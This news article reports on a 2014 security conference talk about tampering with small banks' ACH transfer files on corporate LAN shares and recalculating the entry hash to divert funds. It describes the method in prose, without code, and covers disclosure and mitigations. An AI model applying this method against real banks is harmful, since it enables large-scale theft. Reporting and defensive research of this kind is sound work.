Atlanta -- Many banks with less than $50 billion in assets have a problem that payment systems like Apple Pay will make even more attractive to exploit, a team of security researchers says.
By altering electronic-transfer files before they are uploaded to the national transaction clearinghouse, criminals can redirect funds to accounts they control and make off with millions of dollars at a clip, according to researchers at TrustCC, a consultancy specializing in financial institution IT security.
They presented their findings at (ISC)² Security Congress 2014.
The problem is that many banks and credit unions place these sensitive files on their corporate LANs before uploading them to the Automated Clearing House (ACH) system, - a commercial network that processes a variety of financial transactions - via an ACH operator. That leaves the files vulnerable to hackers who have successfully infiltrated the LAN.
While the attack isn’t common yet, it could become moreso as consumers shift from traditional magnetic-strip credit cards to more secure chip-and-pin credit cards and alternative payment systems such as Apple Pay. These more secure method will mean more work for professional hackers, say TrustCC researchers Andy Robbins and Brandon Henry.
When that happens, criminals may seek to steal directly from banks because they will present easier targets with larger potential payoffs per compromise, they say. “Then banks are a pretty juicy target,” he says.
TrustCC researcher Brandon Henry
Victims of the attack the researchers describe would be among the roughly 4,000 banks and credit unions in the U.S. that have less than $50 billion in assets – considered small banks. Larger banks – that actually control the vast majority of funds involved in ACH transfers – use an architecture that doesn’t expose the same vulnerability, Henry says.
But in smaller banks, batch files in ACH format are generally created in secure core networks. At the end of the day these files are shifted to shares on the corporate LAN to be reviewed by persons on the institutions’ accounting teams. Once approved, these files are sent to an ACH operator.
The flaw in the system is that ACH files are often left as shares for some period of time. If hackers can access them before the person in accounting, they can alter them, Henry says.The accountants verify the total of the file credits and debits and the number of batches. Some institutions have fraud-analytics departments that dig into the files more, but many just inspect numbers within the batches called the file control record. When files are uploaded, the ACH operator verifies that the batch is without error by checking the entry hash that is within the file control record. So the hacker code would alter the relevant numbers to divert the transfer to thieves’ accounts and recalculate the folder’s entry hash so it jibes with the contents of the altered folder. If automated, the altering process takes about a tenth of a second using 35 lines of Python code. “It’s so painfully simple any competent programmer could put this together in a day,” he says.
These fraudulent transfers can easily go unnoticed for 24 hours, he says, but even if it’s a shorter period it’s certainly long enough for the criminals to shift the funds again and make them impossible to recover.
Before the exposed batch folders can be altered, though, hackers first have to break into bank LANs and gain enough privileges to access the shares that contain them. Robbins says in his penetration-testing experience hackers can escalate to domain administrator in financial institutions about half the time using phishing in combination with other common hacking methods. Once they’ve done that they can almost always find ACH folders, he says.
The researchers have come up with a proof-of-concept of this hack they say they’ve presented it to various financial institution associations and to NACHA which manages development and administration of ACH. After two months of responsible disclosure, they’ve decided to publicly reveal it. Recently they have been in touch with NACHA and they feel some progress is being made toward fixing the problem.
There are many ways to address the problem, but ultimately encryption needs to be baked into the file itself when it is created, Henry says.
All access to these files should be logged and write access should only be allowed for the core system. ACH workstations and terminals should have only read access.
Robbins admitted that the largest of banks – those that account overwhelmingly for the monetary value of total transactions upload transfers electronically directly from their core banking networks.
Some smaller banks outsource their core networks to outsourcers but still expose ACH files to their business networks, he says. Sometimes the outsourcers place their core networks on the bank’s corporate LAN.